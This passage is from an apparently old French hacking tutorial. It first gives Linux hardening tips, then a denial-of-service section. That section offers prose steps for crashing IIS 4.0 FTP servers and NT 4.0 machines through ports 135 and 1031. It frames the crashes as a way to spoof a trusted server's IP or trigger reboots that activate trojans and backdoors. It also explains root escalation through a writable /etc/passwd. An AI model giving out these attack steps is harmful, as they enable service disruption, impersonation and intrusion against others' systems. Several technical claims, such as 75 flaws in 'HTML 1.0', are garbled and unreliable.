Ici tout dépends du serveur FTP que vous avez alors plutôt que de détailler la manière de changer la bannière de chaque serveur FTP je vous conseillerais plutôt de lancer un telnet sur vous pour connaitre votre serveur FTP puis de lancer une recherche sur tous les fichiers contenant ce nom en faisant un locate (ex: locate*wu*). Ensuite vous ouvrirez chacun des fichiers trouvés et si l'un deux contient le texte que vous avez vu précédement en faisant un Ftp 127.0.0.1, vous le remplacerez par le texte de votre choix et celui ci devrait s'afficher après que vous ayez sauvegardé le fichier quand vous relancerez un ftp sur vous.
 

Vous avez entendu parler des exploits bien entendu et bien c'est à cela que nous allons nous interresser maintenant vu que les bugs entrainant des failles de sécurité sont nombreux même si plus la distribution de Linux est récente moins vous avez de chance que de tels bugs ait encore été découvert. Mais pour éviter qu'un intru chopent un shell (accès en telnet) sur votre bécane ou ne devienne root via cette bécane. Alors on va partir à la recherche de patch pour certain bugs de sécurité et pour cela vous allez aller sur unsecure (www.unsecure.org) ou sur rootshell (www.rootshell.org) et voir tous les exploits disponibles sur votre OS ainsi que sur les programmes que vous avez dans votre Linux et les démons y tournant (telnet, ftp, sendmail...). Ceci nécéssite de bien connaitre le contenu de votre bécane mais c'est toujours la base de tout, dans le hacking comme dans la protection réseau. Dans chaque exploit découvert il y a une explication approfondit et souvent une adresse d'où trouver un patch ou un explication de comment retirer le bug ou de comment éviter qu'on l'exploite. Suivez ces consignes à la lettre pour tous les exploits découverts. Je sais c'est fastidieux et cela vous prendra surement plusieurs heures mais vous aurez un système presque 100% étanche. Il faudra cependant aller voir régulièrement dans ces mêmes sites si de nouveau bugs n'ont pas été trouvé et patcher votre sytème en conséquence. Ceci est vrai surtout pour les distributions récentes car si au départ peu de bugs sont découverts, d'autres seront forcement trouvés car les distributions récentes ne sont pas moins buggés que les autres.

Ci vous voulez installer un serveur appache pour le web faites bien gaffe à ne pas utiliser de cgi ou alors de bien prendre les dernières versions car on recence plus de 75 failles de sécurités dans la version html 1.0. Une fois ce serveur installé, parcourez le web à la recherche de scanneur de failles cgi (il y en a dans n'importe quel site de hacking US) et testez les tous sur vous après les avoir compilés. Si un ou plusieurs bugs sont trouvés, essayez de trouver sur internet le site du constructeur de cette version de cgi (le programme vous dira desquels il sagit) et cherchez le patch ou la dernière version. Ce n'est géneralement pas dur à trouver car leur dns portent le nom de leur version. Par exempe pour le php essayez www.php.com et vous avez 90% de tomber sur ce que vous voulez.

Bon imaginons maintenant qu'un hacker arrive à se procurer un shell sur votre bécane mais pas le root. Il va essayer plein d'exploits qu'il va importer via ftp (qui sera ouvert souvenez vous) mais si vous avez bien fait votre travail il ne devrait pas pouvoir trouver de failles. Vous pouvvez lui compliquer le travail en changeant les droit de cc, de gcc et de c++ qui sont des compilateurs dont les exploits ont besoin pour passer d'un fichier source à un éxécutable. Je dis de changer les droits parce si ous vous progresser dans le Hacking il va falloir apprendre à prgrammer en c/c++ et donc vous aurez besoin de ces compilateurs donc ne les supprimez pas. Maintenant il est certain que le Hacker compilera les exploits chez lui mais bon il peut que cela le fasse chier rien qu'un petit peu ;-)

Toujours dans la perspective que l'intru arrive à se procurer un shell il va falloir éviter ce que j'ai vu sur certains serveurs et qui font dresser les cheveux sur la tête comme par exemple un etc/passwd et un etc/inetd.conf avec des droits en écriture pour les users. Les conséquences de telles erreurs? Simple, dans le premier cas le hacker modifier le UID/GID de l'account où il est loggué par 0:0 puis se deconnecte, se reconnecte et passe root. C'est aussi simple que ça. Dans le deuxième cas cela lui permet d'ouvrir des ports fermés sur la bécanes et ouvrir ainsi des trous de sécurité que vous aviez fermé comme par exemple ouvrir un port régit par un démon comportant un bug que vous n'aviez pas patché car vous le pensiez désactivé à jamais. Et puisqu'on en est à changer les droits des fichiers et bien on va mettre vos passwords en shadows ce qui évitera que n'importe quel user ne les lise. A quoi ca sert un fichier shadows dans ce cas? Pas à le changer de place car tout le monde sait où se trouve un passwd shadow sous Linux mais plutôt à ce que n'importe quel user n'ait pas de droit de lecture dessus car c'est bien la différence entre passwd et shadow, le droit en lecture des users. Et ne vous avisez pas d'enlever le droit de lecture des users simple au /etc/passwd cela entrainerait des problèmes de fonctionnement certains. Alors pour voir si votre Linux a ses passwords shadows ou non vous allez dans /etc et si un fichier nommé "shadow" est là c'est qu'ils le sont. S'il n'est pas là vous allez faire ce que je vous dis pour les transformer en shadows. En fait c'est super simple si vous connaissez un peu linux car vous n'aurez qu'a prendre le fichier nommé shadow ou shado-u du cdrom Linux et l'installer. Je vais vous donner un exemple sous RedHat pour ceux qui débutent.Vous allez faire ce qui suit mais si votre cdrom est déjà monté pas la peine de faire le début. Vous mettez le CD n°1 de la Redhat (pas celui contenant les sources) et vous faites:
cd /
cd mnt
mount cdrom
cd cdrom/RedHat/RPMS
rpm -i shadow-u.rpm
Et voila c'était pas plus compliqué que ça.

Toujours dans le cas ou qq'un aurait réussi à se procurer un shell sur votre bécane, et pour éviter de leur faciler les buffer overflow, vous allez changer les droits sur un fichier appelé ps et qui se trouve dans /sbin. Ne donnez de droits à ce fichiers qu'au root de manière à ce que si un intru arrive à se loguer en simple user il ne puisse savoir quels programmes ont été lancés et surtout par qui il a été lancé. Bien sûr cela n'empechera pas les ls -l mais vous permettra de fainter par exemple en changeant le owner (propriétaire) d'un programme que vous utilisez souvent de root en simple user. Et de préférence un user que vous n'utiliser jamais. Cette feinte fera croire à l'intru qu'un buffer overflow sur le programme ne sera pas interressant vu qu'il n'aperatient qu'a un simple user alors qu'en faite vous l'aurez lancé en root. Le mieux étant bien sur de ne lancer ce programme qu'en siple user et de se reloguer après en root apres si vous les desirez mais personnelemnt je me sent mieux dans la peau d'un root :-) Bref, enlevez les droits aux simple user au fichier ps ca rendra votre linux un poil plus secure.

Bon maintenant que dire de plus pour sécuriser votre Linux? Il va falloir que vous supprimiez les droits aux users à tous les fichiers contenant des password comme ceux pour votre connection internet mais faites cependant attention à ce que cela ne vous empèche pas de vous connecter en temps qu'user. Je ne vais pas vous faire un listing complet d'où changer les droits car avec le temps vous apprendrez de vous même et une liste exaustive ne pourrait être de toute façon faite car vous avez probablement sur vos distributions des programmes que je n'ai même jamais utilisé. N'hésitez pas à faire des expériences, c'est comme ça que l'on apprends. Voila je pense avoir fait le tour mais je vous conseillerais d'aller sur internet à la recherche de programmes pour renforcer encore votre sécurité comme par exemple Xinetd ou tcp-wrapper ou encore inetd.sec qui sont des programmes de substitutaion à inetd.conf qui sont plus secure et en freeware sur le net. Il y a aussi Securiweb qui est en train de coder un FW anti nmap, il serait donc interressant de se le procurer pour augmenter encore sa sécurité surtout si, comme je le pense il permettra de bluffer un figerprinting visant votre bécane. Il existe encore beaucoup d'exemples de programmes visant à obtenir une sécurité accrue et une simple visite sur un site de sécurité informatique peut contribuer à augmenter votre sécurité de bien 5% à 10%.
 
 

 

DoS (Denial of Service) :

Denial of service qu'est ce que c'est? Simple: un plantage en règle. Ici je vais vous expliquer comment en provoquer un sur différents Os et différentes versions. Il en existe des centaines de différentes alors je ne pourrais pas toutes vous les mettre ici et d'ailleur je suis loin d'en connaître des centaines de toute façon. Cela pourrait s'apparenter à du crashing mais c'est du hacking, en tout cas si ce n'est pas fait pour le plaisir mais pour certaines raison comme la mise en activité d'un troyen, d'une backdoor ou pour faire du spoofing avec l'ip du serveur crashé. Le effets d'un nuker peut être assimilé à un DoS même s'il sagit plutôt d'un O.O.B. (Out Of Band) car l'effet est le même (en tout cas s'il réussi ce qui est de plus en plus rare actuellement).

Vous savez que pour faire du spoofing il faut:

-Soit renter dans une bécane par un port permettant de se rediriger après ailleur. Cela aura pour effet de prendre son ip. Ensuite vous vous redirigerez sur la bécane cible pour se faire passer pour quelqu'un d'autre et ainsi détourner la vigilence de firewall et autres. Port que je connais permettant de spoofer: 23 (tenet), 8080, 1080 (socks), 80 (http), 3129 (wingate), 70 (gopher), 8000 (http), 8001, 8002, 443(https). Et il doit y en avoir plein d'autres mais ce sont les plus connus et les plus utlisés.

-Soit utiliser une ip qui n'existe pas déjà. Et comme le but du spoof c'est de prendre une ip à qui un serveur fait confiance, l'ip existe forcement et elle est fixe (pas dynamique) ce qui veut dire que le serveur est en permanence connecté et que si vous voulez prendre son ip il va falloir le déconnecter car vous savez que deux ip ne peuvent pas être identiques sur un même réseau parce que ça foutrait grave la merde (alors il y a des sécurités pour que vous ne puissiez pas). Donc le serveur il va falloir le déconnecter et c'est là qu'arrive le DoS.

Je disais que le DoS servait aussi à la mise en route des troyens et de certaines backdoors et bien je vais vous expliquer rapidement pourquoi sans empiéter sur l'article des backdoors. La plupars des troyens ont besoin que l'ordinateur sur lequel ils tournent soit rebooté pour se mettre en route. La problème des serveurs est que la plupars du temps ils sont connectés 24/24h et 7/7j et donc ils ne rebootent pas d'eux même, il va donc falloir les faire rebooter malgré eux. Et c'est aussi le cas de certaines backdoors. Si vous ne savez pas ce que c'est reportez vous l'article que j'ai fais sur elles plus haut. La majorité des bakdoors est effective imédiatement mais cartaines (notamment celles que l'on met dans un programme particulier ne se lançant qu'au boot) demandent un redemarrage. Bon la plupars du temps quand vous placez une backdoor c'est que vousêtes déjà root donc vous pouvez rebooter vous même mais bon le cas d'un DoS pour activer une backdoor s'est déjà présenté alors je vous l'explique.

Bref un DoS ça sert et c'est un composant essentielle de techniques de hacking un peu poussées donc pour moi ce n'est pas du crashing mais tout dépends de comment vous l'employez. Je vais donc vous ennumerez quelques manières de faire un Denial of service sur différents OS. D'autre techniques viendront s'ajouter avec le temps, voici déjà celles que je vous propose:

IIS 4.0 avec serveur FTP:
IIS est un serveur web dévellopé par microsoft tournant sur n'importe quel OS je pense. Si la bécane sur laquelle  il tourne a un port FTP ouvert, même anonyme, connectez y vous simultanément une dizaine de fois et envoyez sur chacune des dix connections les commandes "put" ou "delete". je vous conseillerais de faire un script (en c parce que le spoof est plus aisé sous linux mais pour un DoS juste ça n'a pas d'importance) qui fasse toutes ces opérations à votre place sinon vous ne serez pas assez rapide. Ensuite le serveur devrait vous envoyer une erreur 426 (connection closed, transfert aborded ou un truc dans le genre). Cette attaque rends le serveur inutilisable par n'import quel user, root y compris et la seule manière de le rendre opérationnel à nouveau est des rebooter le serveur. Ce qui veut dire que jusqu'au reboot vous pourrez spoofer. Si vous utilisez l'ip du serveur crashé et que lui essaye de se reconnecter il n'y arrivera pas donc vous pouvez spoofer pendant un an si vous voulez et surtout si vous ne vous déconnectez pas. Pas de patch dévellopés à ma connaissance alors amusez vous bien mais foutez pas la merde.

Windows 95 non patché:
C'est le nuke dont je parlais tout à l'heure. Pour une plus grande explication allez dans la partie inclassables de ce site.

NT 4.0 n'ayant pas IIS (NT PPTP):
Connectez vous sur le port 135 (loc-srv) ou sur le port 1031(iad2) avec telnet et envoyez plein de carctères aléatoires, cela bloquera le serveur. Cela marchera aussi sur les NT 4.0 qui ont IIS pour le port 135 mais pas pour le 1031 (pourtant plus efficasse) car IIS le choisit aléatoirement et il y a donc peu de chance que ce soit celui là. Mais c'est comme pour tout, il faut toujours essayer. Comme pour le DoS de IIS 4, il va falloir que vous créez un script en c pour générer des caractères aléatoires car cela vous fera gagner du temps, sera plus efiicasse et moins chiant. Pas de patchs existant pour cette atrtque mais l'admin peut décider de fermer ces port s'il n'en a pas besoin et là vous l'avez dans le baba.

Voila c'est tout pour l'instant mais j'en mettrais d'autres bientôt. Je sais c'est ce que j'ai dis aussi sur les cgi mais ça va venir. Et puis je morcelle peut être les information pour vous donner envie de revenir qui sait. ;-) Ce sera surtout des attaques sur NT car c'est microsoft mais j'en ai aussi sur Unix alors ne vous inquiétez pas.